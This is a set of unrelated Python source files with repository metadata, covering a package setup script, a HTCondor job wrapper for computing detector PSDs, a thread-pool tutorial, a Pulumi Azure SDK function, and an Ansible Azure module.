welbornprod/findfunc
|
d90cbe0110a0f9b656b0ff70846e0c29a583f703
|
0247cba193fb3193c60399c3d2f9910e85319493
|
refs/heads/master
| 2021-01-19T09:29:10.707496
| 2019-04-02T23:14:08
| 2019-04-02T23:14:08
| 87,763,285
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,355
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
FindFunc Setup
-Christopher Welborn 04-09-2017
"""
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
# Try using the latest DESC.txt.
shortdesc = 'Finds function definitions/signatures from the command line.'
try:
with open('DESC.txt', 'r') as f:
shortdesc = f.read()
except FileNotFoundError:
pass
# Default README files to use for the longdesc, if pypandoc fails.
readmefiles = ('docs/README.txt', 'README.txt', 'docs/README.rst')
for readmefile in readmefiles:
try:
with open(readmefile, 'r') as f:
longdesc = f.read()
break
except EnvironmentError:
# File not found or failed to read.
pass
else:
# No readme file found.
# If a README.md exists, and pypandoc is installed, generate a new readme.
try:
import pypandoc
except ImportError:
print('Pypandoc not installed, using default description.')
longdesc = shortdesc
else:
# Convert using pypandoc.
try:
longdesc = pypandoc.convert('README.md', 'rst')
except EnvironmentError:
# No readme file, no fresh conversion.
print('Pypandoc readme conversion failed, using default desc.')
longdesc = shortdesc
setup(
name='FindFunc',
version='0.4.4',
author='Christopher Welborn',
author_email='cj@welbornprod.com',
packages=['findfunc'],
url='https://github.com/welbornprod/findfunc',
description=shortdesc,
long_description=longdesc,
keywords=(
'python 3 command line tool function class definition signature'
),
classifiers=[
'License :: OSI Approved :: MIT License',
'Operating System :: Microsoft :: Windows',
'Operating System :: POSIX :: Linux',
'Programming Language :: Python',
'Programming Language :: Python :: 3 :: Only',
'Topic :: Software Development :: Libraries',
'Topic :: Software Development :: Libraries :: Python Modules',
],
install_requires=[
'colr >= 0.8.1',
'docopt >= 0.6.2',
'pygments >= 2.1.3',
'printdebug >= 0.3.0',
],
entry_points={
'console_scripts': [
'findfunc = findfunc.__main__:entry_point',
],
}
)
|
[
"cj@welbornprod.com"
] |
cj@welbornprod.com
|
46cb1c572815f8a6d20635acff1d237fcd0d8db4
|
215bf668b69b5ebea1b538be217a7cd91db1772a
|
/bin/condor-compute-psd
|
7e2e02878351d44edbb14260ba2a9af208a2b15f
|
[
"MIT"
] |
permissive
|
reedessick/exposure
|
a2fce2e0a2ff059200d0498ae68e81a6e2bb1b9c
|
10aeb1fb29befbbb305d65c379d983fd8bad5693
|
refs/heads/master
| 2022-04-05T09:36:15.969152
| 2020-02-28T23:24:05
| 2020-02-28T23:24:05
| 105,042,945
| 0
| 0
|
MIT
| 2019-08-08T16:09:08
| 2017-09-27T16:35:52
|
Python
|
UTF-8
|
Python
| false
| false
| 6,825
|
#!/usr/bin/env python
__doc__ = "a very basic wrapper that schedules `compute-psd` jobs. The resulting DAG should run to completion if everything worked correctly (i.e. nodes should not raise exceptions"
__author__ = "Reed Essick (reed.essick@ligo.org)"
#-------------------------------------------------
import os
import getpass ### for default accounting_group_user
import subprocess as sp
from distutils.spawn import find_executable
from argparse import ArgumentParser
### non-standard libraries
from exposure import utils
from exposure import datafind
#-------------------------------------------------
parser = ArgumentParser(description=__doc__)
parser.add_argument('channel', type=str)
parser.add_argument('frametype', type=str)
parser.add_argument('gpsstart', type=int)
parser.add_argument('gpsstop', type=int)
parser.add_argument("-v", "--verbose", default=False, action="store_true")
parser.add_argument("-V", "--Verbose", default=False, action="store_true")
parser.add_argument("--include-flag", default=[], type=str, action='append',
help='the flags used to select subsets of [gpsstart, gpsstop] for analysis. \
Can be repeated to take the intersection of multiple flags. \
DEFAULT=[] (analyze all time in [gpsstart, gpsstop]).')
parser.add_argument("--exclude-flag", default=[], type=str, action='append',
help='the same as --include-flag, except we only retain times that are \
outside of these flags instead of inside them')
parser.add_argument("--win", default=60, type=int,
help="estimate PSDs separately in sequential windows of this duration. \
DEFAULT=60")
parser.add_argument("--seglen", default=4, type=int,
help='the length of segments used to estimate the PSD via an averaging procedure (specify in seconds). \
NOTE: if we do not obtain an integer number of segments based on --seglen, --overlap, gpsstart, and gpsstop, \
we will raise a ValueError. DEFAULT=4')
parser.add_argument("--overlap", default=2, type=float,
help='the amount of time overlapped for segments used to estimate the PSD (specify in seconds). \
NOTE: if we do not obtain an integer number of segments based on --seglen, --overlap, gpsstart, and gpsstop, \
we will raise a ValueError. DEFAULT=2')
parser.add_argument("--tukey-alpha", default=0.50, type=float,
help='the Tukey "alpha" value used for windowing the DFT. \
DEFAULT=0.50')
parser.add_argument('--universe', default='vanilla', type=str,
help='DEFAULT=vanilla')
parser.add_argument('--exe', default='compute-psd', type=str,
help='specify the explicit path to the executable. \
DEFAULT=compute-psd')
parser.add_argument('--accounting-group', default=utils.DEFAULT_ACCOUNTING_GROUP, type=str)
parser.add_argument('--accounting-group-user', default=getpass.getuser(), type=str,
help='DEFAULT='+getpass.getuser())
parser.add_argument('--retry', default=utils.DEFAULT_RETRY, type=int)
parser.add_argument('--psd-suffix', default='csv.gz', type=str)
parser.add_argument("-o", "--output-dir", default='.', type=str)
parser.add_argument("-t", "--tag", default="", type=str)
parser.add_argument('-s', '--condor-submit', default=False, action='store_true',
help='submit the DAG to condor')
args = parser.parse_args()
stride = args.gpsstop - args.gpsstart
assert args.channel[0]==args.frametype[0], 'I do not believe you want a channel and frametype \
from different IFOs\n\tchannel : %s\n\tframetype : %s'%(args.channel, args.frametype)
assert args.seglen > args.overlap, '--seglen must be larger than --overlap'
if args.tag:
filetag = "_"+args.tag
else:
filetag = ""
args.output_dir = os.path.abspath(args.output_dir)
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
logdir = os.path.join(args.output_dir, 'log')
if not os.path.exists(logdir):
os.makedirs(logdir)
args.verbose |= args.Verbose
#-------------------------------------------------
### query segments to define individual runs
### ensure we have proper coverage
segments = [[args.gpsstart, args.gpsstop]]
segments = datafind.include_flags(segments, args.include_flag, args.gpsstart, stride, verbose=args.verbose)
segments = datafind.exclude_flags(segments, args.exclude_flag, args.gpsstart, stride, verbose=args.verbose)
### check to make sure we have livetime left, etc
assert len(segments), 'no remaining livetime after filtering by flags!'
lvtm = utils.livetime(segments) ### amount of time requested within segments
#------------------------
### write sub file
subname = "%s/compute-psd%s-%d-%d.sub"%(args.output_dir, filetag, args.gpsstart, stride)
if args.verbose:
print( "writing : "+subname )
with open(subname, 'w') as f:
f.write(utils.compute_psd_sub%{\
'universe' : args.universe,
'exe' : os.path.abspath(find_executable(args.exe)),
'channel' : args.channel,
'frametype' : args.frametype,
'accounting_group' : args.accounting_group,
'accounting_group_user' : args.accounting_group_user,
'tag' : "--tag "+args.tag if args.tag else '',
'filetag' : filetag,
'start' : args.gpsstart,
'dur' : stride,
'seglen' : args.seglen,
'overlap' : args.overlap,
'tukey_alpha' : args.tukey_alpha,
'suffix' : args.psd_suffix,
})
### iterate over segments and define compute-psd jobs for each
dagname = subname.replace('.sub', '.dag')
if args.verbose:
print( "writing : "+dagname )
with open(dagname, 'w') as f:
covered = 0 ### amount of time that's covered by a PSD estimate
for segstart, segstop in segments:
segdur = segstop - segstart
if args.verbose:
print( "scheduling jobs for %d -- %d"%(segstart, segstop) )
s = (segstart/args.win)*args.win ### line-up start with integer number of windows. Needed to guarantee files will line up later -> integer division!
if s < segstart: ### mostly likely case, but we need to check just in case
s += args.win
while s+args.win < segstop:
f.write(utils.compute_psd_dag%{\
'jobid' : '%d'%s,
'sub' : subname,
'gpsstart' : s,
'gpsstop' : s+args.win,
'retry' : args.retry,
'outdir' : args.output_dir,
})
s += args.win
covered += args.win
#-------------------------------------------------
if args.verbose: ### report amount of time covered
print( 'requested : %d sec'%stride )
print( 'within segments : %d sec'%lvtm )
print( 'covered by PSD : %d sec'%covered )
### submit
if args.condor_submit:
if args.verbose:
print( 'submitting : '+dagname )
import subprocess as sp
sp.Popen(['condor_submit_dag', dagname]).wait()
elif args.verbose:
print( 'you can now submit : '+dagname )
|
[
"reed.essick@ligo.org"
] |
reed.essick@ligo.org
|
|
42c5f9db30567097bc2bfb0f4424be748d2301fc
|
0b5be4b9162c19cf0d98972e52ce80aa8af47f0a
|
/Thread/thread/concurrent_futures.py
|
5b0040e31097304271f9bf34a179dee1e60395c7
|
[] |
no_license
|
Air-Zhuang/Test35
|
374c974a2a7693fff21be81278c1bb59a050f7ee
|
d9f92b7a025c91b7503f02afc896ac769f818a84
|
refs/heads/master
| 2021-06-19T12:36:13.383878
| 2019-09-21T08:02:43
| 2019-09-21T08:02:43
| 147,629,865
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,004
|
py
|
'''
用于线程池和进程池编程(顶层的包,高度封装)
主线程中可以获取某一个线程的状态或者某一个任务的状态,以及返回值
当一个线程完成的时候我们主线程能立即知道
futures可以让多线程和多进程编码接口一致
'''
from concurrent.futures import ThreadPoolExecutor,as_completed,wait
import time
def get_html(times):
time.sleep(times)
print("get page {} success".format(times))
return str(times) #使用线程池可以获取返回值
'''基本用法'''
exector=ThreadPoolExecutor(max_workers=2) #创造最大进程数为2的线程池
task1=exector.submit(get_html,(0.5)) #传参必须这么写,不知道原因
task2=exector.submit(get_html,(0.3))
task3=exector.submit(get_html,(0.4))
print("task3任务已取消:",task3.cancel()) #取消任务(任务必须还未开始执行)
print("task1任务已完成:",task1.done()) #判断任务是否已执行完(立即执行,不会被上面的代码阻塞)
time.sleep(1)
print("task1任务已完成:",task1.done())
print("task1返回值:",task1.result()) #可以获取任务的返回值
print()
'''获取已经完成的task的返回'''
urls=[2,1,3]
all_task=[exector.submit(get_html,(i)) for i in urls]
wait(all_task) #等待某个任务执行完成,必须传iterable
print("main")
for i in as_completed(all_task):
res=i.result()
print("返回值为:",res)
print()
'''通过executor获取已经完成的task的返回'''
for i in exector.map(get_html,urls):
print("返回值为:", i)
print()
'''with'''
def fib(n):
if n<2:
return 1
return fib(n-1)+fib(n-2)
with ThreadPoolExecutor(3) as exector:
all_task=[exector.submit(fib,(num)) for num in range(25,35)]
start_time=time.time()
for i in as_completed(all_task):
res = i.result()
print("exe result:{}".format(res))
print(time.time()-start_time)
print()
|
[
"737248514@qq.com"
] |
737248514@qq.com
|
c97c300158c4f94cf5638626ee2d67678df0fbee
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/network/v20200401/get_virtual_network_gateway_learned_routes.py
|
dc0c3a5ca849b2e3f6452ce8aa86df4484b07682
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 2,485
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetVirtualNetworkGatewayLearnedRoutesResult',
'AwaitableGetVirtualNetworkGatewayLearnedRoutesResult',
'get_virtual_network_gateway_learned_routes',
]
@pulumi.output_type
class GetVirtualNetworkGatewayLearnedRoutesResult:
"""
List of virtual network gateway routes.
"""
def __init__(__self__, value=None):
if value and not isinstance(value, list):
raise TypeError("Expected argument 'value' to be a list")
pulumi.set(__self__, "value", value)
@property
@pulumi.getter
def value(self) -> Optional[Sequence['outputs.GatewayRouteResponse']]:
"""
List of gateway routes.
"""
return pulumi.get(self, "value")
class AwaitableGetVirtualNetworkGatewayLearnedRoutesResult(GetVirtualNetworkGatewayLearnedRoutesResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetVirtualNetworkGatewayLearnedRoutesResult(
value=self.value)
def get_virtual_network_gateway_learned_routes(resource_group_name: Optional[str] = None,
virtual_network_gateway_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetVirtualNetworkGatewayLearnedRoutesResult:
"""
List of virtual network gateway routes.
:param str resource_group_name: The name of the resource group.
:param str virtual_network_gateway_name: The name of the virtual network gateway.
"""
__args__ = dict()
__args__['resourceGroupName'] = resource_group_name
__args__['virtualNetworkGatewayName'] = virtual_network_gateway_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20200401:getVirtualNetworkGatewayLearnedRoutes', __args__, opts=opts, typ=GetVirtualNetworkGatewayLearnedRoutesResult).value
return AwaitableGetVirtualNetworkGatewayLearnedRoutesResult(
value=__ret__.value)
|
[
"noreply@github.com"
] |
morrell.noreply@github.com
|
c52d224e402e87d8d7bbd7f8372abf8d931c4167
|
02338bb8111fc1aa88e830ac09a11664720eb2d4
|
/tmp/azure_rm_jobversion.py
|
544592c6f9d2166c6ff192b0e8a5c5bd17aecd3a
|
[] |
no_license
|
Fred-sun/fred_yaml
|
a49977b0e8505c7447df23dd80c7fef1be70e6bc
|
295ca4cd2b59b8d2758f06eb7fd79920327ea524
|
refs/heads/master
| 2023-04-28T05:51:56.599488
| 2023-04-25T13:52:10
| 2023-04-25T13:52:10
| 131,376,340
| 0
| 1
| null | 2020-07-06T14:22:46
| 2018-04-28T05:34:49
|
TSQL
|
UTF-8
|
Python
| false
| false
| 7,350
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2020 GuopengLin, (@t-glin)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_jobversion
version_added: '2.9'
short_description: Manage Azure JobVersion instance.
description:
- 'Create, update and delete instance of Azure JobVersion.'
options:
resource_group_name:
description:
- >-
The name of the resource group that contains the resource. You can
obtain this value from the Azure Resource Manager API or the portal.
required: true
type: str
server_name:
description:
- The name of the server.
required: true
type: str
job_agent_name:
description:
- The name of the job agent.
required: true
type: str
job_name:
description:
- The name of the job.
required: true
type: str
job_version:
description:
- The version of the job to get.
required: true
type: integer
state:
description:
- Assert the state of the JobVersion.
- >-
Use C(present) to create or update an JobVersion and C(absent) to delete
it.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure
author:
- GuopengLin (@t-glin)
'''
EXAMPLES = '''
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: null
name:
description:
- Resource name.
returned: always
type: str
sample: null
type:
description:
- Resource type.
returned: always
type: str
sample: null
'''
import time
import json
import re
from ansible.module_utils.azure_rm_common_ext import AzureRMModuleBaseExt
from copy import deepcopy
try:
from msrestazure.azure_exceptions import CloudError
from azure.mgmt.sql import SqlManagementClient
from msrestazure.azure_operation import AzureOperationPoller
from msrest.polling import LROPoller
except ImportError:
# This is handled in azure_rm_common
pass
class Actions:
NoAction, Create, Update, Delete = range(4)
class AzureRMJobVersion(AzureRMModuleBaseExt):
def __init__(self):
self.module_arg_spec = dict(
resource_group_name=dict(
type='str',
required=True
),
server_name=dict(
type='str',
required=True
),
job_agent_name=dict(
type='str',
required=True
),
job_name=dict(
type='str',
required=True
),
job_version=dict(
type='integer',
required=True
),
state=dict(
type='str',
default='present',
choices=['present', 'absent']
)
)
self.resource_group_name = None
self.server_name = None
self.job_agent_name = None
self.job_name = None
self.job_version = None
self.body = {}
self.results = dict(changed=False)
self.mgmt_client = None
self.state = None
self.to_do = Actions.NoAction
super(AzureRMJobVersion, self).__init__(derived_arg_spec=self.module_arg_spec,
supports_check_mode=True,
supports_tags=True)
def exec_module(self, **kwargs):
for key in list(self.module_arg_spec.keys()):
if hasattr(self, key):
setattr(self, key, kwargs[key])
elif kwargs[key] is not None:
self.body[key] = kwargs[key]
self.inflate_parameters(self.module_arg_spec, self.body, 0)
old_response = None
response = None
self.mgmt_client = self.get_mgmt_svc_client(SqlManagementClient,
base_url=self._cloud_environment.endpoints.resource_manager,
api_version='2017-03-01-preview')
old_response = self.get_resource()
if not old_response:
if self.state == 'present':
self.to_do = Actions.Create
else:
if self.state == 'absent':
self.to_do = Actions.Delete
else:
modifiers = {}
self.create_compare_modifiers(self.module_arg_spec, '', modifiers)
self.results['modifiers'] = modifiers
self.results['compare'] = []
if not self.default_compare(modifiers, self.body, old_response, '', self.results):
self.to_do = Actions.Update
if (self.to_do == Actions.Create) or (self.to_do == Actions.Update):
self.results['changed'] = True
if self.check_mode:
return self.results
response = self.create_update_resource()
elif self.to_do == Actions.Delete:
self.results['changed'] = True
if self.check_mode:
return self.results
self.delete_resource()
else:
self.results['changed'] = False
response = old_response
return self.results
def create_update_resource(self):
try:
if self.to_do == Actions.Create:
response = self.mgmt_client.job_versions.create()
else:
response = self.mgmt_client.job_versions.update()
if isinstance(response, AzureOperationPoller) or isinstance(response, LROPoller):
response = self.get_poller_result(response)
except CloudError as exc:
self.log('Error attempting to create the JobVersion instance.')
self.fail('Error creating the JobVersion instance: {0}'.format(str(exc)))
return response.as_dict()
def delete_resource(self):
try:
response = self.mgmt_client.job_versions.delete()
except CloudError as e:
self.log('Error attempting to delete the JobVersion instance.')
self.fail('Error deleting the JobVersion instance: {0}'.format(str(e)))
return True
def get_resource(self):
try:
response = self.mgmt_client.job_versions.get(resource_group_name=self.resource_group_name,
server_name=self.server_name,
job_agent_name=self.job_agent_name,
job_name=self.job_name,
job_version=self.job_version)
except CloudError as e:
return False
return response.as_dict()
def main():
AzureRMJobVersion()
if __name__ == '__main__':
main()
|
[
"xiuxi.sun@qq.com"
] |
xiuxi.sun@qq.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.